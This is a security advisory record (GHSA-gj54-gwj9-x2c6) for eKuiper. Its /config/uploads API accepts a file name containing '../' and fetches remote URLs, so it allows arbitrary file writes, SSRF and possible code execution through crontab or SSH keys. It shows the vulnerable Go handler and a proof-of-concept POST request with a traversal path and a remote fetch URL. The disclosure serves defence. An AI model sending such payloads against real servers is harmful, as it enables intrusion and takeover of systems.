GHSA-gj54-gwj9-x2c6

Suggest an improvement
Source
https://github.com/advisories/GHSA-gj54-gwj9-x2c6
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-gj54-gwj9-x2c6/GHSA-gj54-gwj9-x2c6.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-gj54-gwj9-x2c6
Published
2025-07-03T14:22:05Z
Modified
2025-07-03T14:22:05Z
Severity
  • 7.3 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P CVSS Calculator
Summary
eKuiper /config/uploads API arbitrary file writing may lead to RCE
Details

Summary

eKuiper /config/uploads API supports accessing remote web URLs and saving files in the local upload directory, but there are no security restrictions, resulting in arbitrary file writing through ../. If run with root privileges, RCE can be achieved by writing crontab files or ssh keys.

Details

func fileUploadHandler(w http.ResponseWriter, r *http.Request) {
    switch r.Method {
    // Upload or overwrite a file
    case http.MethodPost:
        switch r.Header.Get("Content-Type") {
        case "application/json":
            fc := &fileContent{}
            defer r.Body.Close()
            err := json.NewDecoder(r.Body).Decode(fc)
            if err != nil {
                handleError(w, err, "Invalid body: Error decoding file json", logger)
                return
            }
            err = fc.Validate()
            if err != nil {
                handleError(w, err, "Invalid body: missing necessary field", logger)
                return
            }

            filePath := filepath.Join(uploadDir, fc.Name)
            err = upload(fc)

- The fc.Name parameter do not safely filtered.

PoC

POST /config/uploads HTTP/1.1
Host: localhost:9081
Content-Type: application/json
Content-Length: 89

{
  "name": "../../../../tmp/success",
 "file": "http://192.168.65.254:8888/success"
}

image

Impact

Tested and verified only on 1.14.3 and 1.14.1, theoretically all versions using this code could be affected.

  1. SSRF
  2. Path-Travel
  3. May leads to RCE

The reporters is m0d9 from Tencent YunDing Lab.

Database specific 
{
    "github_reviewed": true,
    "nvd_published_at": null,
    "severity": "HIGH",
    "cwe_ids": [
        "CWE-434"
    ],
    "github_reviewed_at": "2025-07-03T14:22:05Z"
}
References

Affected packages

Go / github.com/lf-edge/ekuiper/v2

Package

Name
github.com/lf-edge/ekuiper/v2
View open source insights on deps.dev
Purl
pkg:golang/github.com/lf-edge/ekuiper/v2

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
2.2.0

Go / github.com/lf-edge/ekuiper

Package

Name
github.com/lf-edge/ekuiper
View open source insights on deps.dev
Purl
pkg:golang/github.com/lf-edge/ekuiper

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Last affected
1.14.7